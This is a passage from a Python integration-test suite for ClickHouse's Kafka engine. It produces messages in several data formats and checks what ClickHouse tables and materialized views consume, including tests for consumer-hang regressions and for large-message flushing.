# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# ],
# },
}
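# The 'AvroConfluent' samples above come from avro_confluent_message(), which presumably
# wraps each record in the Confluent wire format (hence the format_avro_schema_registry_url
# setting on that table). A minimal sketch of that framing, assuming a known schema id and
# an already Avro-encoded payload (illustrative only, not used by this test):
#
#     import struct
#
#     def confluent_frame(schema_id, avro_payload):
#         # magic byte 0x00, 4-byte big-endian schema registry id, then the Avro body
#         return b'\x00' + struct.pack('>I', schema_id) + avro_payload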
for format_name, format_opts in list(all_formats.items()):
print('Set up {}'.format(format_name))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend an empty value when the format supports it (also exercises empty-message handling)
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
time.sleep(12)
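# The fixed 12 second sleep above is a heuristic wait for the Kafka engine to consume and
# flush into the materialized views. A polling alternative (sketch only, not wired into the
# test; 'instance' and the table names are the ones created above) could look like:
#
#     def wait_for_rows(table, expected_rows, timeout=60):
#         deadline = time.time() + timeout
#         while time.time() < deadline:
#             if int(instance.query('SELECT count() FROM {}'.format(table))) >= expected_rows:
#                 return True
#             time.sleep(0.5)
#         return False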
for format_name, format_opts in list(all_formats.items()):
print('Checking {}'.format(format_name))
topic_name = 'format_tests_{}'.format(format_name)
# shift expected offsets by 1 when the format supports an empty value: the prepended empty message occupies offset 0
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Unexpected result for format: {}'.format(format_name)
# Receiving messages from Kafka is asynchronous and timing-dependent,
# so results may need to be checked several times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
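# NB: a minimal sketch (not part of the original suite) of the retry pattern the
# comment above describes - keep re-reading the table and re-checking against the
# reference until it matches or a deadline passes. The helper name and the 180s
# default deadline are illustrative assumptions, not existing test API.
def kafka_check_result_with_retry(query, ref_file='test_kafka_json.reference', timeout=180):
    deadline = time.monotonic() + timeout
    result = ''
    while time.monotonic() < deadline:
        result += instance.query(query, ignore_error=True)
        if kafka_check_result(result, False, ref_file):
            return result
        time.sleep(0.5)
    kafka_check_result(result, True, ref_file)  # final check=True call raises a readable assertion
    return result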
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(name):
client = BrokerConnection('localhost', 9092, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available()
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert a couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
time.sleep(10)
instance.query('SELECT * FROM test.view')
# This should trigger a heartbeat failure,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
time.sleep(0.5)
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever for the application to execute the queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# the first consumer subscribes to the topic, tries to poll some data, and goes idle
instance.query('SELECT * FROM test.kafka')
# the second consumer does the same, leading to a rebalance in the first
# consumer, which then tries to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# the first consumer has a pending rebalance callback left unprocessed (no poll after the select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_csv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_tsv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_select_empty(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
SELECT * FROM test.kafka;
''')
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 21, 29)
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batches of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
